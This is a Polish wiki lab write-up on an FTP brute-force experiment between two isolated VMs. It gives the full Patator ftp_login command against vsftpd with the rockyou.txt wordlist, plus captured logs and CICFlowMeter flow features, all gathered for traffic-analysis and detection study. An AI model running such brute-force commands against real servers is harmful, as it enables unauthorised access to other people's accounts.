Kacper's Wiki

Ta strona jest tylko do odczytu. Możesz wyświetlić źródła tej strony ale nie możesz ich zmienić.
====== Security: FTP Bruteforce (Patator i CICFlowMeter) ======

===== Schemat i opis środowiska testowego =====

<diagram><svg xmlns="http://www.w3.org/2000/svg" style="background: transparent; background-color: transparent; color-scheme: light dark;" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="263px" height="224px" viewBox="-0.5 -0.5 263 224" content="&lt;mxfile host=&quot;wiki.ostrowski.net.pl&quot; agent=&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0&quot; version=&quot;26.2.15&quot;&gt;&lt;diagram id=&quot;gtjQNWmoT4qQz-VoZcrC&quot; name=&quot;Page-1&quot;&gt;7VhtT9swEP41/bgor7T92DcYEmMIkLZ9QiYxiYcTR86lL/v1OydOk9SBMVHBJqFGrf3c+ey753zXduQt0u2ZJHnyRUSUj1w72o685ch1J06A7wrY1YB/ooFYsqiGnBa4Yb+oBm2NliyiRU8RhODA8j4YiiyjIfQwIqXY9NUeBO/vmpOYGsBNSLiJfmMRJNqtwG7xz5TFSbOzY2tJShplDRQJicSmA3mrkbeQQkA9SrcLylXsmrjU606fkO4PJmkGL1ng1gvWhJfat1siYwoj94Sjgfm9xFGsRo5t6Qetub4+PuyamOw9sVE5IkVCIz1JIOU4dHBYgBSPdCG4kIhkIsPF8wfGeQONXM/3p0GlzMk95VeiYMBEhrIQfaKoNF9TCQzZuDhQuBcAIu0ozDiLlQBEjijRs70dUQJnGR6nyRJ1WvQjVy6l21jlrrWmlKSWG1lrJqEk/C4lYcKqg+vY4WZ0+2T8nT2reBuoSCnIHaroBU0e6IvgBF4937Rp5fvWpAaTTk75mgGiUznem27ZxoEmfJh8zyB/BkDCRyqfod/9oP+I9Dvvyf+JwSKNsM7pqZCQiFhkhK9adC5FmUV7bludC6GCXBH3kwLsdNEmJYh+DtAtg+96uRr/UGMr0LPltiNa7jqTKyoZeqiYq7EsmqlS3iZSAUTCKVPuVhq1d8ql59nBCIhShlpLxxXqMtgWSZNDSTkBtu5bfw0f4/fkw/l/+PDeiA/fqI/nl7efLle3ZvV7pBAm2s9csAyqbYM5PrZlq+87i/3nKMAli0oynfxJoj87ksaaKXFroA8OYWMTdCqbbjAADmHjw70rwBnY+xBzB8BBkwN72weHxOcF7aCT7E90hiKvG8AD26qrZLaKilIqV2taM+sMdIqQFaFwppasbM1zeR5W5+DuXbFhVXoc9rrTmXoZjRElth3YY+84TcYxmoxtNJkG6raYBnvNFZoYV+V4DcQKgl7Nmv47RSt4vyYy/Yj4G7eJwGgT8+vz5dnK/BJ9+xX1sIesroeaCFrFH7C0U1pCLkpVjzYJA3qTk8rZDVabPj9HqBHjoF8izArhuAMlYvL3JQKn7c/bStb5j8Bb/QY=&lt;/diagram&gt;&lt;/mxfile&gt;"><defs/><g><g data-cell-id="0"><g data-cell-id="1"><g data-cell-id="2"><g><path d="M 14 187 L 14 143 L 58.8 143 L 58.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 35.25 171.3 L 36.02 159.39 L 39.71 159.39 L 42 166.98 L 44.48 159.39 L 48.09 159.39 L 48.74 171.3 L 46.06 171.3 L 45.7 162.24 L 42.85 171.3 L 40.68 171.3 L 38.25 162.44 L 37.79 171.3 Z M 26.88 171.3 L 22.94 159.39 L 25.97 159.39 L 28.57 168.21 L 31.28 159.39 L 34.21 159.39 L 30.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 36px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Target<br />10.10.10.1/24</div></div></div></foreignObject><text x="36" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Target...</text></switch></g></g></g><g data-cell-id="3"><g><path d="M 204 187 L 204 143 L 248.8 143 L 248.8 187 Z" fill="#4495d1" style="fill: light-dark(rgb(68, 149, 209), rgb(61, 131, 183));" stroke="none" pointer-events="all"/><path d="M 225.25 171.3 L 226.02 159.39 L 229.71 159.39 L 232 166.98 L 234.48 159.39 L 238.09 159.39 L 238.74 171.3 L 236.06 171.3 L 235.7 162.24 L 232.85 171.3 L 230.68 171.3 L 228.25 162.44 L 227.79 171.3 Z M 216.88 171.3 L 212.94 159.39 L 215.97 159.39 L 218.57 168.21 L 221.28 159.39 L 224.21 159.39 L 220.09 171.3 Z" fill="#ffffff" style="fill: light-dark(rgb(255, 255, 255), rgb(18, 18, 18));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 194px; margin-left: 226px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">Attacker<br />10.10.10.2/24</div></div></div></foreignObject><text x="226" y="206" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">Attacke...</text></switch></g></g></g><g data-cell-id="6"><g><path d="M 104 165 L 58.8 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="7"><g><path d="M 154 165 L 204 165" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="4"><g><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z" fill="#fafafa" style="fill: light-dark(rgb(250, 250, 250), rgb(22, 22, 22));" stroke="none" pointer-events="all"/><rect x="104" y="140" width="50" height="50" fill="none" stroke="none" pointer-events="all"/><path d="M 127.38 180.52 L 127.38 176.53 L 116.78 176.53 L 116.78 173.39 L 107.75 178.71 L 116.78 183.96 L 116.78 180.52 Z M 132.32 161.46 L 132.32 157.48 L 121.73 157.48 L 121.73 154.33 L 112.7 159.66 L 121.73 164.9 L 121.73 161.46 Z M 126.38 171.06 L 126.38 167.08 L 136.98 167.08 L 136.98 163.93 L 146 169.26 L 136.98 174.51 L 136.98 171.06 Z M 130.96 152.32 L 130.96 148.34 L 141.55 148.34 L 141.55 145.2 L 150.58 150.52 L 141.55 155.77 L 141.55 152.32 Z M 107.07 140 C 105.38 140 104 141.37 104 143.05 L 104 186.95 C 104 188.63 105.38 190 107.07 190 L 150.93 190 C 152.62 190 154 188.63 154 186.95 L 154 143.05 C 154 141.37 152.62 140 150.93 140 Z M 107.07 141.38 L 150.93 141.38 C 151.88 141.38 152.62 142.11 152.62 143.05 L 152.62 186.95 C 152.62 187.89 151.88 188.62 150.93 188.62 L 107.07 188.62 C 106.12 188.62 105.38 187.89 105.38 186.95 L 105.38 143.05 C 105.38 142.11 106.12 141.38 107.07 141.38 Z" fill="#005073" style="fill: light-dark(rgb(0, 80, 115), rgb(124, 193, 223));" stroke="none" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe flex-start; justify-content: unsafe center; width: 1px; height: 1px; padding-top: 197px; margin-left: 129px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: nowrap; ">INT-NET</div></div></div></foreignObject><text x="129" y="209" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">INT-NET</text></switch></g></g></g><g data-cell-id="8"><g><path d="M 135 76 L 58.8 144.78" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="9"><g><path d="M 135 76 L 204 143.19" fill="none" stroke="#000000" style="stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke-miterlimit="10" pointer-events="stroke"/></g></g><g data-cell-id="5"><g><path d="M 99 20 C 75 20 69 40 88.2 44 C 69 52.8 90.6 72 106.2 64 C 117 80 153 80 165 64 C 189 64 189 48 174 40 C 189 24 165 8 144 16 C 129 4 105 4 99 20 Z" fill="#ffffff" style="fill: light-dark(#ffffff, var(--ge-dark-color, #121212)); stroke: light-dark(rgb(0, 0, 0), rgb(255, 255, 255));" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/></g><g><g transform="translate(-0.5 -0.5)"><switch><foreignObject style="overflow: visible; text-align: left;" pointer-events="none" width="100%" height="100%" requiredFeatures="http://www.w3.org/TR/SVG11/feature#Extensibility"><div xmlns="http://www.w3.org/1999/xhtml" style="display: flex; align-items: unsafe center; justify-content: unsafe center; width: 118px; height: 1px; padding-top: 40px; margin-left: 70px;"><div style="box-sizing: border-box; font-size: 0; text-align: center; color: #000000; "><div style="display: inline-block; font-size: 12px; font-family: &quot;Helvetica&quot;; color: light-dark(#000000, #ffffff); line-height: 1.2; pointer-events: all; white-space: normal; word-wrap: normal; ">BRIDGE<br />TO INTERNET</div></div></div></foreignObject><text x="129" y="44" fill="light-dark(#000000, #ffffff)" font-family="&quot;Helvetica&quot;" font-size="12px" text-anchor="middle">BRIDGE...</text></switch></g></g></g></g></g></g></svg></diagram>

Opis:

Środowisko składa się z dwóch maszyn wirtualnych (VM) działających na Ubuntu Server:

  * Maszyna atakująca: uruchomiony program Patator do ataku brute-force na usługę FTP oraz tcpdump do przechwytywania ruchu.
  * Maszyna ofiara: zainstalowany i skonfigurowany serwer FTP (vsftpd).
  * Sieć: maszyny podłączone do tego samego switcha wirtualnego w Hyper-V.

Każda z Maszyn ma dysk o rozmiarze 8GB ([[https://documentation.ubuntu.com/server/reference/installation/system-requirements/|Wymagania minimalne ubuntu]] mówią o minimalnie 5GB). Dyski są w formacie vhdx, wykorzystywanym przez hyper-v.

Dyski maszyn można pobrać z linka poniżej:\\
https://1drv.ms/f/c/9dd28f74d9c48b45/ElEe6P0-WYpOmB3YukiRtzwBVGtNNW8QbW3jmy5V-9PWPQ?e=RSLSO4\\
Hasło do linka: ''Ostrowski19062025''

===== Oprogramowanie wykorzystane do wykonania eksperymentu =====

^ Komponent                             ^ Wersja                     ^ Nazwa          ^
| System operacyjny maszyn wirtualnych  | 24.04.2 LTS                | Ubuntu Server  |
| Hypervisor                            | Wersja: 10.0.26100.1882    | Hyper-V        |
| Serwer FTP                            | 3.0.5                      | VSFTPD         |
| Narzędzie ataku                       | 1.0                        | Patator        |
| Przechwytywanie ruchu                 | 4.99.1                     | tcpdump        |
| Analiza Ruchu                         | 0.4.2                      | CICFlowMeter   |
| Słownik do ataku                      | ok. 14 MB, 14344392 haseł  | rockyou.txt    |

====== Instalacja i konfiguracja ======

===== Maszyna ofiara =====

<code bash>
administrator@target:~$ sudo apt update -y
[sudo] password for administrator:
Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
58 packages can be upgraded. Run 'apt list --upgradable' to see them.
administrator@target:~$ sudo apt install vsftpd -y
[LOGI Z INSTALACJI]
</code>

Zmiany w pliku konfiguracyjnym ''/etc/vsftpd.conf'':\\
<code bash>
anonymous_enable=NO
local_enable=YES
write_enable=YES
listen=YES
listen_ipv6=NO
</code>

Tworzenie użytkownika FTP z hasłem ''a7s8d6a8s7d6a8s7d68s7'':\\
<code bash>
administrator@target:~$ sudo adduser ftpuser
info: Adding user `ftpuser' ...
info: Selecting UID/GID from range 1000 to 59999 ...
info: Adding new group `ftpuser' (1001) ...
info: Adding new user `ftpuser' (1001) with group `ftpuser (1001)' ...
info: Creating home directory `/home/ftpuser' ...
info: Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for ftpuser
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] y
info: Adding new user `ftpuser' to supplemental / extra groups `users' ...
info: Adding user `ftpuser' to group `users' ...
administrator@target:~$
</code>

Restart usługi:\\
<code bash>
administrator@target:~$ sudo systemctl restart vsftpd
administrator@target:~$ sudo systemctl status vsftpd.service
● vsftpd.service - vsftpd FTP server
     Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; enabled; preset: e>
     Active: active (running) since Thu 2025-06-19 15:00:47 UTC; 6s ago
    Process: 4065 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited>
   Main PID: 4068 (vsftpd)
      Tasks: 1 (limit: 4602)
     Memory: 704.0K (peak: 1.5M)
        CPU: 7ms
     CGroup: /system.slice/vsftpd.service
             └─4068 /usr/sbin/vsftpd /etc/vsftpd.conf

Jun 19 15:00:47 target systemd[1]: Starting vsftpd.service - vsftpd FTP server.>
Jun 19 15:00:47 target systemd[1]: Started vsftpd.service - vsftpd FTP server.
administrator@target:~$
</code>

===== Maszyna atakująca =====

Instalacja Narzędzi:\\
<code bash>
administrator@attacker:~$ sudo apt update -y
[sudo] password for administrator:
Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
58 packages can be upgraded. Run 'apt list --upgradable' to see them.
administrator@attacker:~$ sudo apt install git python3-pip tcpdump -y
[TUTAJ LOGI Z INSTALACJI]
</code>

Przed instalacją patatora dodano repozytoria kali-linux do ubuntu.\\
Instalacja Patatora:\\
<code bash>
administrator@attacker:~$ sudo apt install patator -y
[TUTAJ LOGI Z INSTALACJI]
</code>

Instalacja CICFlowMeter w wersji Python:\\
<code bash>
administrator@attacker:~/patator$ pip install cicflowmeter
[TUTAJ LOGI Z INSTALACJI]
</code>

Pobranie słownika do ataku:\\
<code bash>
administrator@attacker:~$ wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
--2025-06-19 15:19:13--  https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz [following]
--2025-06-19 15:19:14--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53291283 (51M) [application/octet-stream]
Saving to: ‘rockyou.txt.tar.gz’

rockyou.txt.tar.gz                                  100%[=================================================================================================================>]  50.82M  1.56MB/s    in 32s

2025-06-19 15:19:48 (1.59 MB/s) - ‘rockyou.txt.tar.gz’ saved [53291283/53291283]

administrator@attacker:~$ tar -xzf rockyou.txt.tar.gz
administrator@attacker:~$ wc -l rockyou.txt #liczba haseł około 14 milionów
14344391 rockyou.txt
administrator@attacker:~$ head rockyou.txt #pierwsze wpisy w pliku
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
</code>

====== Test Komunikacji ======
Ping:\\
<code bash>
administrator@target:~$ ping 10.10.10.2
PING 10.10.10.2 (10.10.10.2) 56(84) bytes of data.
64 bytes from 10.10.10.2: icmp_seq=1 ttl=64 time=0.180 ms
64 bytes from 10.10.10.2: icmp_seq=2 ttl=64 time=0.229 ms
64 bytes from 10.10.10.2: icmp_seq=3 ttl=64 time=0.269 ms
64 bytes from 10.10.10.2: icmp_seq=4 ttl=64 time=0.286 ms
64 bytes from 10.10.10.2: icmp_seq=5 ttl=64 time=0.266 ms
64 bytes from 10.10.10.2: icmp_seq=6 ttl=64 time=0.293 ms
64 bytes from 10.10.10.2: icmp_seq=7 ttl=64 time=0.284 ms
^C
--- 10.10.10.2 ping statistics ---
7 packets transmitted, 7 received, 0% packet loss, time 6182ms
rtt min/avg/max/mdev = 0.180/0.258/0.293/0.037 ms
administrator@target:~$
</code>
FTP:\\
<code bash>
administrator@attacker:~$ ftp 10.10.10.1
Connected to 10.10.10.1.
220 (vsFTPd 3.0.5)
Name (10.10.10.1:administrator): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||8296|)
150 Here comes the directory listing.
226 Directory send OK.
ftp>
</code>

====== Przeprowadzenie Ataku ======

W jednej sesji terminala uruchomienie przechwytywania:\\
<code bash>
sudo tcpdump -i eth1 port 21 -w ftp_attack.pcap
</code>

W drugiej sesji terminala atak Patator:\\
<code bash>
administrator@attacker:~$ patator ftp_login host=10.10.10.1 user=ftpuser password=FILE0 0=rockyou.txt -x ignore:mesg='Login incorrect' --rate-limit=50
15:39:45 patator    INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.12.3 at 2025-06-19 15:39 UTC
15:39:45 patator    INFO -
15:39:45 patator    INFO - code  size    time | candidate                          |   num | mesg
15:39:45 patator    INFO - -----------------------------------------------------------------------------
15:40:38 patator    INFO - 530   16     2.772 | 123456                             |     1 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.778 | 12345                              |     2 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.785 | 123456789                          |     3 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.770 | password                           |     4 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.770 | iloveyou                           |     5 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.786 | princess                           |     6 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.776 | 1234567                            |     7 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.773 | rockyou                            |     8 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.784 | 12345678                           |     9 | Login incorrect.
15:40:38 patator    INFO - 530   16     2.778 | abc123                             |    10 | Login incorrect.
[TUTAJ CIĄGNIE SIĘ DALEJ]
</code>

  * ''--rate-limit=50'': ogranicza tempo ataku do 50 prób/sekundę (by nie przytłoczyć serwera)
  * ''rockyou.txt'': używa ogólnodostępnego słownika

<WRAP center round important 60%>
W tym przypadku atak się nie powiedzie, ponieważ utworzone hasło nie znajduje się w rockyou.txt – i o to właśnie chodzi: chodzi o symulację nieudanego ataku, który będzie wyraźnie widoczny w ruchu.
</WRAP>


====== Efekty Ataku ======

===== Po stronie atakującej =====

  * Konsola Patatora wykaże tysiące nieudanych prób.
  * Hasło nie zostanie złamane.
  * Cały ruch jest zapisany w ftp_attack.pcap.

===== Po stronie serwera FTP =====

Fragment logu z /var/log/vsftpd.log:
<code yaml>
administrator@target:~$ sudo tail -f /var/log/vsftpd.log
[sudo] password for administrator:
Thu Jun 19 15:27:39 2025 [pid 6752] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:27:50 2025 [pid 6751] [ftpuser] OK LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7001] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7003] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7005] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7007] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7009] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7011] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7013] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7015] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7017] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:35 2025 [pid 7019] CONNECT: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:40:37 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:41:30 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
Thu Jun 19 15:42:23 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
[TUTAJ CIĄGNIE SIĘ DALEJ]
</code>

Pełna wersja logów do pobrania {{:notatki:vsftpd_copy.log}}

<WRAP center round info 60%>
Po 765 próbach (~122min) zatrzymano eksperyment
</WRAP>
 

====== Użycie CICFlowMeter (Python) i ekstrakcja cech ======

<code bash>
administrator@attacker:~$ cicflowmeter -f ftp_attack.pcap -c ftp_attack.csv
reading from file ftp_attack.pcap, link-type EN10MB (Ethernet), snapshot length 262144
administrator@attacker:~$ ls -lah
total 186M
drwxr-x--- 7 administrator administrator 4.0K Jun 19 17:16 .
drwxr-xr-x 3 root          root          4.0K Jun 19 15:07 ..
-rw------- 1 administrator administrator 1.1K Jun 19 15:25 .bash_history
-rw-r--r-- 1 administrator administrator  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 administrator administrator 3.7K Mar 31  2024 .bashrc
drwx------ 4 administrator administrator 4.0K Jun 19 17:15 .cache
drwx------ 2 administrator administrator 4.0K Jun 19 17:15 .config
-rw-rw-r-- 1 administrator administrator 263K Jun 19 17:16 ftp_attack.csv
-rw-r--r-- 1 tcpdump       tcpdump       750K Jun 19 17:09 ftp_attack.pcap
drwxrwxr-x 7 administrator administrator 4.0K Jun 19 15:13 patator
-rw-r--r-- 1 administrator administrator  807 Mar 31  2024 .profile
-rw------- 1 administrator administrator 134M Sep 23  2015 rockyou.txt
-rw-rw-r-- 1 administrator administrator  51M Jun 19 15:19 rockyou.txt.tar.gz
drwx------ 2 administrator administrator 4.0K Jun 19 15:07 .ssh
-rw-r--r-- 1 administrator administrator    0 Jun 19 15:08 .sudo_as_admin_successful
drwxrwxr-x 6 administrator administrator 4.0K Jun 19 15:16 venv_patator
-rw-rw-r-- 1 administrator administrator  215 Jun 19 15:19 .wget-hsts
-rw------- 1 administrator administrator  108 Jun 19 15:25 .Xauthority
administrator@attacker:~$ cat ftp_attack.csv
src_ip,dst_ip,src_port,dst_port,protocol,timestamp,flow_duration,flow_byts_s,flow_pkts_s,fwd_pkts_s,bwd_pkts_s,tot_fwd_pkts,tot_bwd_pkts,totlen_fwd_pkts,totlen_bwd_pkts,fwd_pkt_len_max,fwd_pkt_len_min,fwd_pkt_len_mean,fwd_pkt_len_std,bwd_pkt_len_max,bwd_pkt_len_min,bwd_pkt_len_mean,bwd_pkt_len_std,pkt_len_max,pkt_len_min,pkt_len_mean,pkt_len_std,pkt_len_var,fwd_header_len,bwd_header_len,fwd_seg_size_min,fwd_act_data_pkts,flow_iat_mean,flow_iat_max,flow_iat_min,flow_iat_std,fwd_iat_tot,fwd_iat_max,fwd_iat_min,fwd_iat_mean,fwd_iat_std,bwd_iat_tot,bwd_iat_max,bwd_iat_min,bwd_iat_mean,bwd_iat_std,fwd_psh_flags,bwd_psh_flags,fwd_urg_flags,bwd_urg_flags,fin_flag_cnt,syn_flag_cnt,rst_flag_cnt,psh_flag_cnt,ack_flag_cnt,urg_flag_cnt,ece_flag_cnt,down_up_ratio,pkt_size_avg,init_fwd_win_byts,init_bwd_win_byts,active_max,active_min,active_mean,active_std,idle_max,idle_min,idle_mean,idle_std,fwd_byts_b_avg,fwd_pkts_b_avg,bwd_byts_b_avg,bwd_pkts_b_avg,fwd_blk_rate_avg,bwd_blk_rate_avg,fwd_seg_size_avg,bwd_seg_size_avg,cwr_flag_count,subflow_fwd_pkts,subflow_bwd_pkts,subflow_fwd_byts,subflow_bwd_byts
10.10.10.1,10.10.10.2,21,37852,6,2025-06-19 15:41:31,103.324816,12.12680601337824,0.1645296905246848,0.09678217089687341,0.06774751962781139,10,7,736,517,100,54,73.6,15.226293048539425,81,66,73.85714285714286,6.854166020511517,100,54,73.70588235294117,12.479464099930464,155.73702422145328,200,140,20,4,6.457801,49.981098,0.0,16.465319560282826,103.324816,50.001816,0.0,11.480535111111113,20.609759023049122,103.284029,49.981098,4e-05,17.21400483333333,23.19276500435293,4,3,0,0,3,0,2,7,15,0,0,0.7,73.70588235294117,510,502,0,0,0,0,0,0,0,0,0,0,0,0,0,0,73.6,73.85714285714286,0,10,7,736,517
[I TAK DALEJ]
</code>


Wynik przechwytywania do pobrania {{:notatki:ftp_attack.pcap}}

Wynik ekstrakcji cech do pobrania {{:notatki:ftp_attack.csv}}

===== Kluczowe cechy wyniku (Analiza pierwszego wiersza CSV) =====

<code>
src_ip=10.10.10.1, dst_ip=10.10.10.2, dst_port=37852, protocol=6 (TCP)
flow_duration=103.3 s  
tot_fwd_pkts=10, tot_bwd_pkts=7  
flow_byts_s ≈ 12.13 B/s, flow_pkts_s ≈ 0.165 pkt/s  
pkt_len_mean ≈ 73.7 B
flow_iat_mean ≈ 16.47 s
bwd_blk_rate_avg ≈ 0.7 (ilość pakietów w tył do przodu)
</code>

